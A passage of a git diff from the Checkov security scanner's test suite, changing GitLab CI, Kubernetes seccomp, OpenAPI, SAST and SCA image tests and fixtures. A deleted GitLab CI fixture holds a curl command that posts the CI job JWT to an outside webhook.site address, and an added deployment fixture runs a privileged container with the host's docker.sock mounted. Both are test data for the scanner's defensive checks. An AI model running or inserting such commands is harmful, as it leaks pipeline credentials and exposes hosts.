-    assert len(sca_image_report.skipped_checks) == 0
-    assert len(sca_image_report.parsing_errors) == 0
diff --git a/tests/github_actions/test_runner.py b/tests/github_actions/test_runner.py
index fe16fe7c5cf..963a5a8ffe8 100644
--- a/tests/github_actions/test_runner.py
+++ b/tests/github_actions/test_runner.py
@@ -229,9 +229,9 @@ def test_runner_on_build(self):
         assert report.failed_checks[0].triggers[0] == {'workflow_dispatch', 'push'}
         assert report.failed_checks[0].workflow_name == 'build'
 
-        assert report.passed_checks[6].job[0] == "publish-checkov-dockerhub"
-        assert report.passed_checks[6].triggers[0] == {'workflow_dispatch', 'push'}
-        assert report.passed_checks[6].workflow_name == 'build'
+        assert report.passed_checks[8].job[0] == "publish-checkov-dockerhub"
+        assert report.passed_checks[8].triggers[0] == {'workflow_dispatch', 'push'}
+        assert report.passed_checks[8].workflow_name == 'build'
 
     def test_runner_on_codeql_analysis(self):
         # given
diff --git a/tests/gitlab_ci/image_referencer/__init__.py b/tests/gitlab_ci/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml
deleted file mode 100644
index bb827be51cb..00000000000
--- a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml
+++ /dev/null
@@ -1,7 +0,0 @@
-default:
-  image:
-    name: redis:latest
-    entrypoint: ["/bin/bash"]
-
-deploy:
-  script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'
\ No newline at end of file
diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml
deleted file mode 100644
index 28796e6c1fe..00000000000
--- a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml
+++ /dev/null
@@ -1,8 +0,0 @@
-unit tests:
-  image:
-    entrypoint:
-      - "/opt/bin/entry_point_unit_tests.sh"
-
-  services:
-    - name: "postgres:13.2"
-      alias: postgres
\ No newline at end of file
diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py
deleted file mode 100644
index 5857aabca69..00000000000
--- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py
+++ /dev/null
@@ -1,139 +0,0 @@
-from checkov.common.images.image_referencer import Image
-from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider
-
-
-def test_extract_images_from_workflow():
-    file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml'
-    workflow_config = {
-        "default": {
-            "image": {
-                "name": "ruby:2.6",
-                "entrypoint": [
-                    "/bin/bash"
-                ],
-                "__startline__": 3,
-                "__endline__": 6
-            },
-            "services": [
-                {
-                    "name": "privateregistry/stuff/my-postgres:11.7",
-                    "alias": "db-postgres",
-                    "__startline__": 7,
-                    "__endline__": 9
-                },
-                {
-                    "name": "redis:latest",
-                    "__startline__": 9,
-                    "__endline__": 10
-                },
-                "nginx:1.17"
-            ],
-            "before_script": [
-                "bundle install"
-            ],
-            "__startline__": 2,
-            "__endline__": 15
-        },
-        "__startline__": 1,
-        "__endline__": 32
-    }
-
-    gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path)
-    images = gitlab_ci_provider.extract_images_from_workflow()
-
-    assert set(images) == {
-        Image(
-            end_line=6,
-            start_line=3,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='default.image'
-        ),
-        Image(
-            end_line=10,
-            start_line=9,
-            file_path=file_path,
-            name='redis:latest',
-            related_resource_id='default.services.2'
-        ),
-        Image(
-            end_line=10,
-            start_line=9,
-            file_path=file_path,
-            name='nginx:1.17',
-            related_resource_id='default.services.2'
-        ),
-        Image(
-            end_line=9,
-            start_line=7,
-            file_path=file_path,
-            name='privateregistry/stuff/my-postgres:11.7',
-            related_resource_id='default.services.1'
-        )
-    }
-
-
-def test_extract_images_from_workflow_no_images():
-    file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml'
-    workflow_config = {
-        "script": "echo \"This job creates double pipelines!\"",
-        "rules": [
-            {
-                "changes": [
-                    "$DOCKERFILES_DIR/*"
-                ],
-                "__startline__": 4,
-                "__endline__": 6
-            },
-            {
-                "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"",
-                "__startline__": 6,
-                "__endline__": 7
-            },
-            {
-                "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"",
-                "__startline__": 7,
-                "__endline__": 9
-            }
-        ],
-        "__startline__": 2,
-        "__endline__": 9
-    }
-
-    gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path)
-    images = gitlab_ci_provider.extract_images_from_workflow()
-
-    assert not images
-
-
-def test_extract_images_from_workflow_image_without_name():
-    file_path = 'tests/gitlab_ci/resources/rules/image_without_name.gitlab-ci.yml'
-    workflow_config = {
-          "unit tests": {
-            "image": {
-              "entrypoint": [
-                "/opt/bin/entry_point_unit_tests.sh"
-              ],
-              "__startline__": 3,
-              "__endline__": 6
-            },
-            "services": [
-              {
-                "name": "postgres:13.2",
-                "alias": "postgres",
-                "__startline__": 7,
-                "__endline__": 8
-              }
-            ],
-            "__startline__": 2,
-            "__endline__": 8
-          },
-          "__startline__": 1,
-          "__endline__": 8
-        }
-
-    gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path)
-    images = gitlab_ci_provider.extract_images_from_workflow()
-
-    assert len(images) == 1
-    assert images[0] == Image(name='postgres:13.2', file_path=file_path, start_line=7, end_line=8, related_resource_id='unit tests.services.1')
diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py
deleted file mode 100644
index 869e8419c89..00000000000
--- a/tests/gitlab_ci/image_referencer/test_manager.py
+++ /dev/null
@@ -1,106 +0,0 @@
-from checkov.common.images.image_referencer import Image
-from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager
-
-
-def test_extract_images_from_workflow():
-    file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml'
-    workflow_config = {
-        "default": {
-            "image": {
-                "name": "ruby:2.6",
-                "entrypoint": [
-                    "/bin/bash"
-                ],
-                "__startline__": 3,
-                "__endline__": 6
-            },
-            "services": [
-                {
-                    "name": "privateregistry/stuff/my-postgres:11.7",
-                    "alias": "db-postgres",
-                    "__startline__": 7,
-                    "__endline__": 9
-                },
-                {
-                    "name": "redis:latest",
-                    "__startline__": 9,
-                    "__endline__": 10
-                },
-                "nginx:1.17"
-            ],
-            "before_script": [
-                "bundle install"
-            ],
-            "__startline__": 2,
-            "__endline__": 15
-        },
-        "__startline__": 1,
-        "__endline__": 32
-    }
-
-    manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path)
-    images = manager.extract_images_from_workflow()
-
-    assert set(images) == {
-        Image(
-            end_line=6,
-            start_line=3,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='default.image'
-        ),
-        Image(
-            end_line=10,
-            start_line=9,
-            file_path=file_path,
-            name='redis:latest',
-            related_resource_id='default.services.2'
-        ),
-        Image(
-            end_line=10,
-            start_line=9,
-            file_path=file_path,
-            name='nginx:1.17',
-            related_resource_id='default.services.2'
-        ),
-        Image(
-            end_line=9,
-            start_line=7,
-            file_path=file_path,
-            name='privateregistry/stuff/my-postgres:11.7',
-            related_resource_id='default.services.1'
-        )
-    }
-
-
-def test_extract_images_from_workflow_no_images():
-    file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml'
-    workflow_config = {
-        "script": "echo \"This job creates double pipelines!\"",
-        "rules": [
-            {
-                "changes": [
-                    "$DOCKERFILES_DIR/*"
-                ],
-                "__startline__": 4,
-                "__endline__": 6
-            },
-            {
-                "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"",
-                "__startline__": 6,
-                "__endline__": 7
-            },
-            {
-                "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"",
-                "__startline__": 7,
-                "__endline__": 9
-            }
-        ],
-        "__startline__": 2,
-        "__endline__": 9
-    }
-
-    manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path)
-    images = manager.extract_images_from_workflow()
-
-    assert not images
diff --git a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py b/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py
deleted file mode 100644
index cb8d0d193ca..00000000000
--- a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from pathlib import Path
-
-from checkov.common.output.report import CheckType
-
-from checkov.common.bridgecrew.bc_source import get_source_type
-from checkov.gitlab_ci.runner import Runner
-
-from checkov.runner_filter import RunnerFilter
-from pytest_mock import MockerFixture
-
-from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async
-
-RESOURCES_PATH = Path(__file__).parent / "resources/single_image"
-
-
-def test_gitlab_workflow(mocker: MockerFixture):
-    from checkov.common.bridgecrew.platform_integration import bc_integration
-    file_name = ".gitlab-ci.yml"
-    image_name = "redis:latest"
-    image_id = "sha256:2460522297"
-    code_lines = "3-6"
-    image_resource_postfixes = ['go', 'openssl', 'musl']
-    test_file = RESOURCES_PATH / file_name
-
-    runner_filter = RunnerFilter(run_image_referencer=True)
-    bc_integration.bc_source = get_source_type("disabled")
-
-    mocker.patch(
-        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
-        side_effect=mock_get_image_cached_result_async,
-    )
-    mocker.patch(
-        "checkov.common.images.image_referencer.get_license_statuses_async",
-        side_effect=mock_get_license_statuses_async,
-    )
-
-    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
-    assert len(reports) == 2
-
-    gitlab_ci_report = next(report for report in reports if report.check_type == CheckType.GITLAB_CI)
-    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
-
-    assert len(gitlab_ci_report.resources) == 0
-    assert len(gitlab_ci_report.passed_checks) == 1
-    assert len(gitlab_ci_report.failed_checks) == 1
-    assert len(gitlab_ci_report.skipped_checks) == 0
-    assert len(gitlab_ci_report.parsing_errors) == 0
-
-    assert len(sca_image_report.resources) == 3
-    assert sca_image_report.resources == {
-        f"{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}"
-        for postfix in image_resource_postfixes
-    }
-    assert sca_image_report.image_cached_results[0]["dockerImageName"] == "redis:latest"
-    assert sca_image_report.image_cached_results[0]["packages"] == [
-        {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
-    ]
-
-    assert len(sca_image_report.passed_checks) == 1
-    assert len(sca_image_report.failed_checks) == 4
-    assert len(sca_image_report.image_cached_results) == 1
-    assert len(sca_image_report.skipped_checks) == 0
-    assert len(sca_image_report.parsing_errors) == 0
-    assert gitlab_ci_report.passed_checks[0].resource == sca_image_report.image_cached_results[0]["relatedResourceId"]
diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml
new file mode 100644
index 00000000000..1d4027c70e9
--- /dev/null
+++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml
@@ -0,0 +1,15 @@
+apiVersion: batch/v1
+kind: CronJob
+metadata:
+  name: cronjob-failed
+spec:
+  jobTemplate:
+    spec:
+      template:
+        spec:
+          securityContext:
+            runAsNonRoot: true
+          containers:
+          - image: "ubuntu"
+            name: image
+  schedule: "0 2 * * *"
diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml
new file mode 100644
index 00000000000..37ae63bc986
--- /dev/null
+++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml
@@ -0,0 +1,22 @@
+apiVersion: batch/v1
+kind: CronJob
+metadata:
+  name: cronjob-passed2
+spec:
+  jobTemplate:
+    spec:
+      template:
+        metadata:
+          labels:
+            app: new-app
+        spec:
+          securityContext:
+            runAsNonRoot: true
+            seccompProfile:
+              type: RuntimeDefault
+          containers:
+          - image: "ubuntu"
+            name: image
+            securityContext:
+              allowPrivilegeEscalation: false
+  schedule: "0 2 * * *"
diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml
new file mode 100644
index 00000000000..074d70f530d
--- /dev/null
+++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml
@@ -0,0 +1,18 @@
+apiVersion: batch/v1
+kind: CronJob
+metadata:
+  name: cronjob-passed3
+spec:
+  jobTemplate:
+    spec:
+      template:
+        spec:
+          securityContext:
+            seccompProfile:
+              type: RuntimeDefault
+          containers:
+          - image: "ubuntu"
+            name: image
+            seccompProfile:
+              type: RuntimeDefault
+  schedule: "0 2 * * *"
diff --git a/tests/kubernetes/checks/example_Seccomp/template.yaml b/tests/kubernetes/checks/example_Seccomp/template.yaml
new file mode 100644
index 00000000000..7177301c52b
--- /dev/null
+++ b/tests/kubernetes/checks/example_Seccomp/template.yaml
@@ -0,0 +1,86 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  labels:
+    app.kubernetes.io/name: fdn-svc
+  name: fdn-svc
+  namespace: aws-dev
+spec:
+  replicas: 2
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: fdn-svc
+  template:
+    metadata:
+      annotations:
+        checksum/config: 9730118d75e24d06bac70b575dc49f6a75dd23c617198e4346fd6ed449362502
+      labels:
+        app.kubernetes.io/name: fdn-svc
+    spec:
+      containers:
+        - env:
+            - name: APP_PORT
+              value: ''
+            - name: SSU
+              value: ''
+            - name: client_id
+              value: fdn-svc
+            - name: cache
+              value: disabled
+            - name: cache_ttl
+              value: '60'
+            - name: Filter_Attribute_value_separator
+              value: '#'
+            - name: NEW_RELIC_APP_NAME
+              value: ''
+            - name: NEW_RELIC_LICENSE_KEY
+              value: ''
+            - name: PREEMPTIVE_LICENSE_KEY
+              value: ''
+            - name: PREEMPTIVE_USER_EMAIL
+              value: ''
+            - name: DEPENDENCY_CHECK
+              value: 'false'
+            - name: authorization_type
+              value: close
+            - name: RBAC_Support
+              value: enabled
+            - name: TENANT_FILE_PATH
+              value: /secrets
+          image: ''
+          imagePullPolicy: Always
+          name: fdn-svc
+          ports:
+            - containerPort: 8080
+              name: http
+              protocol: TCP
+          resources:
+            limits:
+              cpu: 200m
+              memory: 256Mi
+            requests:
+              cpu: 50m
+              memory: 256Mi
+          securityContext:
+            allowPrivilegeEscalation: false
+            capabilities:
+              drop:
+                - ALL
+            readOnlyRootFilesystem: true
+            runAsNonRoot: true
+            runAsUser: 65532
+            seccompProfile:
+              type: RuntimeDefault
+          volumeMounts:
+            - mountPath: /secrets
+              name: tenant-config-volume
+              readOnly: true
+      imagePullSecrets:
+        - name: bn-image-pullcreds
+      securityContext:
+        runAsUser: 65532
+      serviceAccountName: fdn-svc
+      volumes:
+        - name: tenant-config-volume
+          secret:
+            secretName: fdn-svc-secret
\ No newline at end of file
diff --git a/tests/kubernetes/checks/test_Seccomp.py b/tests/kubernetes/checks/test_Seccomp.py
index 5bc7c380fab..ac19ba80ce2 100644
--- a/tests/kubernetes/checks/test_Seccomp.py
+++ b/tests/kubernetes/checks/test_Seccomp.py
@@ -19,13 +19,15 @@ def test_summary(self):
         passed_resources = [check.resource for check in report.passed_checks]
         failed_resources = [check.resource for check in report.failed_checks]
 
-        self.assertEqual(summary["passed"], 9)
-        self.assertEqual(summary["failed"], 3)
+        self.assertEqual(summary["passed"], 12)
+        self.assertEqual(summary["failed"], 4)
         self.assertEqual(summary["skipped"], 0)
         self.assertEqual(summary["parsing_errors"], 0)
 
         expected_passed_resources = [
             "CronJob.default.cronjob-passed",
+            "CronJob.default.cronjob-passed2",
+            "CronJob.default.cronjob-passed3",
             "CronJob.default.cronjob-securityContext-passed",
             "Deployment.default.seccomp-passed-deployment",
             "Deployment.default.seccomp-passed-metadata-annotations",
@@ -34,8 +36,10 @@ def test_summary(self):
             "Pod.default.seccomp-passed-security-context",
             "StatefulSet.default.RELEASE-NAME",
             "Pod.default.my-secure-pod",
+            "Deployment.aws-dev.fdn-svc",
         ]
         expected_failed_resources = [
+            "CronJob.default.cronjob-failed",
             "Deployment.infra.app-cert-manager",
             "Pod.default.seccomp-failed",
             "Pod.default.my-insecure-pod",
diff --git a/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json
new file mode 100644
index 00000000000..736ddbdacce
--- /dev/null
+++ b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json
@@ -0,0 +1,26 @@
+{
+  "openapi": "3.0.0",
+  "info": {
+    "title": "test",
+    "version": "1.0.0"
+  },
+  "components": {
+    "securitySchemes": {
+      "bearerScheme": {
+        "type": "http",
+        "scheme": "bearer"
+      }
+    }
+  },
+  "paths": {
+    "/": {
+      "get": {
+        "security": [
+          {
+            "bearerScheme": []
+          }
+        ]
+      }
+    }
+  }
+}
diff --git a/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml
new file mode 100644
index 00000000000..2f5a8099f08
--- /dev/null
+++ b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml
@@ -0,0 +1,14 @@
+openapi: 3.0.0
+info:
+  title: test
+  version: 1.0.0
+components:
+  securitySchemes:
+    bearerScheme:
+      type: http
+      scheme: bearer
+paths:
+  "/":
+    get:
+      security:
+        - bearerScheme: []
diff --git a/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py b/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py
index 62d233fd388..402d3f50c3e 100644
--- a/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py
+++ b/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py
@@ -23,6 +23,8 @@ def test_summary(self):
             "/pass.json",
             "/pass2.yaml",
             "/pass2.json",
+            "/pass3.yaml",
+            "/pass3.json",
         }
         failing_resources = {
             "/fail.yaml",
diff --git a/tests/sast/source_code/js_filtered_build_ts/example1/app.ts b/tests/sast/source_code/js_filtered_build_ts/example1/app.ts
new file mode 100644
index 00000000000..ad656e63970
--- /dev/null
+++ b/tests/sast/source_code/js_filtered_build_ts/example1/app.ts
@@ -0,0 +1,2 @@
+let message: string = 'Hello, World!';
+console.log(message);
diff --git a/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json b/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json
new file mode 100644
index 00000000000..5ff64ff7902
--- /dev/null
+++ b/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json
@@ -0,0 +1,13 @@
+{
+  "compilerOptions": {
+    "module": "system",
+    "noImplicitAny": true,
+    "removeComments": true,
+    "preserveConstEnums": true,
+    "outDir": "./build",
+    "sourceMap": true
+  },
+  "include": [
+    "./*.ts"
+  ]
+}
diff --git a/tests/sast/source_code/js_filtered_build_ts/example2/app.ts b/tests/sast/source_code/js_filtered_build_ts/example2/app.ts
new file mode 100644
index 00000000000..ad656e63970
--- /dev/null
+++ b/tests/sast/source_code/js_filtered_build_ts/example2/app.ts
@@ -0,0 +1,2 @@
+let message: string = 'Hello, World!';
+console.log(message);
diff --git a/checkov/azure_pipelines/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example2/needTScan/app.js
similarity index 100%
rename from checkov/azure_pipelines/image_referencer/__init__.py
rename to tests/sast/source_code/js_filtered_build_ts/example2/needTScan/app.js
diff --git a/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json b/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json
new file mode 100644
index 00000000000..00f119f16cd
--- /dev/null
+++ b/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json
@@ -0,0 +1,13 @@
+{
+  "compilerOptions": {
+    "module": "system",
+    "noImplicitAny": true,
+    "removeComments": true,
+    "preserveConstEnums": true,
+    "outFile": "./build/file.js",
+    "sourceMap": true
+  },
+  "include": [
+    "./*.ts"
+  ]
+}
diff --git a/checkov/circleci_pipelines/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example3/main.js
similarity index 100%
rename from checkov/circleci_pipelines/image_referencer/__init__.py
rename to tests/sast/source_code/js_filtered_build_ts/example3/main.js
diff --git a/checkov/github_actions/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example3/main.ts
similarity index 100%
rename from checkov/github_actions/image_referencer/__init__.py
rename to tests/sast/source_code/js_filtered_build_ts/example3/main.ts
diff --git a/tests/sast/test_filter_files_manager.py b/tests/sast/test_filter_files_manager.py
new file mode 100644
index 00000000000..884ede76887
--- /dev/null
+++ b/tests/sast/test_filter_files_manager.py
@@ -0,0 +1,16 @@
+from checkov.sast.engines.files_filter_manager import FilesFilterManager
+from checkov.common.sast.consts import SastLanguages
+import pathlib
+import os
+
+
+def test_sast_js_filtered_files_by_ts():
+    test_dir = os.path.join(pathlib.Path(__file__).parent.resolve(), 'source_code', 'js_filtered_build_ts')
+    files_filter_manager = FilesFilterManager([test_dir], set([SastLanguages.JAVASCRIPT]))
+    filtered_paths = files_filter_manager.get_files_to_filter()
+    paths = {}
+    for path in filtered_paths:
+        if path.endswith('example2/build/file.js') or path.endswith('example1/build') or path.endswith('example3/main.js'):
+            paths[path] = path
+
+    assert len(paths.keys()) == 3
\ No newline at end of file
diff --git a/tests/sast/test_report.py b/tests/sast/test_report.py
index 4229e807e60..ce0facb4f06 100644
--- a/tests/sast/test_report.py
+++ b/tests/sast/test_report.py
@@ -1,17 +1,19 @@
 from __future__ import annotations
 
 from checkov.common.sast.consts import SastLanguages
+from checkov.sast.engines.prisma_engine import PrismaEngine
 from checkov.sast.record import SastRecord
 from checkov.sast.report import SastData, SastReport
 from checkov.common.sast.report_types import Function, PrismaReport, Repositories, File, Package, Point, MatchLocation, \
-    DataFlow, MatchMetadata
+    DataFlow, MatchMetadata, RuleMatch, Match, SkippedCheck, RuleMatchMetadata
 
 
 def _create_sast_reports_for_test_get_sast_reachability_report_with_one_report() -> list[SastReport]:
     # we don't care about the init's params, except for the sast-language
     report1 = SastReport('', {}, SastLanguages.JAVASCRIPT, PrismaReport(rule_match={}, errors={}, profiler={},
                                                                         run_metadata={}, imports={},
-                                                                        reachability_report={}))
+                                                                        reachability_report={},
+                                                                        skipped_checks_by_file={}))
     report1.sast_reachability = {
         'repo_1': Repositories(files={
             '/index.js': File(packages={
@@ -70,3 +72,26 @@ def test_get_code_lines_taint():
     file_details_expected_output = 'file_that_import.js->3->6->imported_file.js->2'
     assert code_lines_expected_output == code_lines_actual_output
     assert file_details_expected_output == file_details_actual_output
+
+
+def test_skipped_checks():
+    report = PrismaReport(rule_match={
+        SastLanguages.PYTHON: {'CKV3_SAST_11': RuleMatch(
+            check_id='CKV3_SAST_11', check_name='Use of module setting superuser port',
+            check_cwe=['CWE-289: Authentication Bypass by Alternate Name'], severity='LOW', check_owasp=None,
+            metadata=RuleMatchMetadata(), matches=[
+                Match(exact_hash='e97a01a1cb2abee84ad113d828f8d500eccb150941200fd6df9356bb9c193604',
+                      structure_hash='8e63ba7c140643381a68470a5d9296e6290999e3fc70971e860480c0bc24a474',
+                      location=MatchLocation(
+                          path='tests/python/src/simple_within.py',
+                          start=Point(row=2, column=0), end=Point(row=2, column=11), code_block='set_port(1)'),
+                      metadata=MatchMetadata(taint_mode=None, code_locations=None),
+                      minimized_ast='{"type":"module","children":[{"type":"expression_statement","children":[{"type":"call","name":"set_port","children":[{"type":"identifier"},{"type":"argument_list","children":[{"type":"integer"}]}]}]}]}')])}
+    }, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={}, skipped_checks_by_file={
+        'tests/python/src/simple_within.py': [SkippedCheck(check_id='CKV3_SAST_11', suppress_comment="Don't feel like it")]
+    })
+    prisma_engine = PrismaEngine()
+    prisma_engine.enable_inline_suppressions = True
+    sast_report = prisma_engine.create_report(report)
+    assert len(sast_report[0].failed_checks) == 0 and len(sast_report[0].skipped_checks) == 1
+    assert sast_report[0].skipped_checks[0].check_result['suppress_comment'] == "Don't feel like it"
diff --git a/tests/sca_image/conftest.py b/tests/sca_image/conftest.py
index a8092dcd6ae..61772b58723 100644
--- a/tests/sca_image/conftest.py
+++ b/tests/sca_image/conftest.py
@@ -14,9 +14,9 @@
 from checkov.common.output.report import Report
 from .mocks import mock_scan
 
+KUBERNETES_EXAMPLES_DIR = Path(__file__).parent / "examples/kubernetes"
 DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile"
 
-
 @pytest.fixture()
 def image_id() -> str:
     return "sha256:6fd085fc6410"
@@ -50,7 +50,7 @@ def empty_report() -> dict[str, Any]:
 
 @pytest.fixture()
 def image_name() -> str:
-    return "python:3.8-alpine"
+    return "ubuntu"
 
 
 @pytest.fixture()
diff --git a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml b/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml
deleted file mode 100644
index 482319d2a29..00000000000
--- a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: CI
-on:
-  push:
-    branches: [ main ]
-jobs:
-  container-test-job:
-    runs-on: ubuntu-latest
-    container:
-      image: node:14.16
-      env:
-        NODE_ENV: development
-      ports:
-        - 80
-      volumes:
-        - my_docker_volume:/volume_mount
-      options: --cpus 1
-    steps:
-      - name: Check for dockerenv file
-        run: (ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)
- 
\ No newline at end of file
diff --git a/tests/sca_image/examples/kubernetes/deployment.yaml b/tests/sca_image/examples/kubernetes/deployment.yaml
new file mode 100644
index 00000000000..225f7176588
--- /dev/null
+++ b/tests/sca_image/examples/kubernetes/deployment.yaml
@@ -0,0 +1,44 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: health-check-deployment
+spec:
+  selector:
+    matchLabels:
+      app: health-check
+  template:
+    metadata:
+      labels:
+        app: health-check
+    spec:
+      containers:
+      - name: health-check
+        image: node:14.16
+        resources:
+          limits:
+            memory: "100Mi"
+            cpu: "30m"
+        ports:
+        - containerPort: 80
+      # Custom Stuff
+        securityContext:
+          privileged: true
+        volumeMounts:
+          - mountPath: /custom/docker/docker.sock
+            name: docker-sock-volume
+      volumes:
+        - name: docker-sock-volume
+          hostPath:
+            path: /var/run/docker.sock
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: health-check-service
+spec:
+  ports:
+  - protocol: TCP
+    port: 80
+    targetPort: 80
+  selector:
+    app: health-check
\ No newline at end of file
diff --git a/tests/sca_image/test_output_reports.py b/tests/sca_image/test_output_reports.py
index 70a8f40ee38..39cf182b1ac 100644
--- a/tests/sca_image/test_output_reports.py
+++ b/tests/sca_image/test_output_reports.py
@@ -31,7 +31,6 @@ def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List
 
 
 def test_console_output(mocker, sca_image_report):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
     console_output = sca_image_report.print_console(False, False, None, None, False)
     assert console_output == "".join(
         [
@@ -53,17 +52,16 @@ def test_console_output(mocker, sca_image_report):
             '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n',
             "\n",
             "\t/path/to/Dockerfile (sha256:123456) - Licenses Statuses:\n",
-            '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n',
-            '\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n',
-            '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n',
-            '\t│ perl                     │ 5.34.0-3ubuntu1          │ BC_LIC_1                 │ Apache-2.0-Fake          │ FAILED                    │\n',
-            '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n',
+            '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n',
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n',
+            '\t│ perl                           │ 5.34.0-3ubuntu1                │ BC_LIC_1                       │ Apache-2.0-Fake                    │\n',
+            '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n',
         ]
     )
 
 
 def test_console_output_in_tty(mocker: MockerFixture, sca_image_report):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
     # simulate a tty call by enforcing color
     mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"})
 
@@ -90,11 +88,11 @@ def test_console_output_in_tty(mocker: MockerFixture, sca_image_report):
             '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n',
             '\n',
